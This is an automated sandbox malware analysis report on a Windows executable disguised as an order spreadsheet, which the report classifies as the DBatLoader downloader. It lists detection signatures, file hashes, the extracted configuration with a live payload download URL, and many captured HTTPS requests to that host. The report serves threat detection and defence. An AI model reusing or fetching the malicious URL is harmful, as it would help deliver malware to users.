Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new_order_xlsx.exe

Overview

General Information

Sample Name:new_order_xlsx.exe
Analysis ID:1303012
MD5:ef6025979e7e27041ef72650fdbe8630
SHA1:8ac15cf845249b2a7c9c095808153656579b1704
SHA256:5c8d558572c445f5fdadc3758c208654d7dd2787a73a2a1e1757e87dd19d6fad
Tags:exe
Infos:

Detection

DBatLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected DBatLoader
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Initial sample is a PE file and has a suspicious name
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
One or more processes crash
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • new_order_xlsx.exe (PID: 6996 cmdline: C:\Users\user\Desktop\new_order_xlsx.exe MD5: EF6025979E7E27041EF72650FDBE8630)
    • WerFault.exe (PID: 5256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1132 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"Download Url": "https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf"}
SourceRuleDescriptionAuthorStrings
new_order_xlsx.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    0.3.new_order_xlsx.exe.2835580.125.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      0.2.new_order_xlsx.exe.3610000.3.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        0.3.new_order_xlsx.exe.2832b58.117.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          0.3.new_order_xlsx.exe.2831148.116.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            0.0.new_order_xlsx.exe.400000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              Click to see the 4 entries
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: new_order_xlsx.exeAvira: detected
              Source: new_order_xlsx.exeMalware Configuration Extractor: DBatLoader {"Download Url": "https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf"}
              Source: new_order_xlsx.exeReversingLabs: Detection: 78%
              Source: https://balkancelikdovme.com:443/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf-Avira URL Cloud: Label: malware
              Source: https://balkancelikdovme.com/LAvira URL Cloud: Label: malware
              Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfrAvira URL Cloud: Label: malware
              Source: https://balkancelikdovme.com:443/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfAvira URL Cloud: Label: malware
              Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfAvira URL Cloud: Label: malware
              Source: new_order_xlsx.exeJoe Sandbox ML: detected
              Source: new_order_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49736 version: TLS 1.2

              Networking

              barindex
              Source: Malware configuration extractorURLs: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: Joe Sandbox ViewASN Name: GYRONGB GYRONGB
              Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:05 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:06 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:07 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:07 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:08 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:08 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:09 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:09 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:10 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:10 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:11 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:11 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:12 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:12 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:13 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:13 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:14 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:14 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:15 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:15 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:16 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:17 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:18 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:19 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:20 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
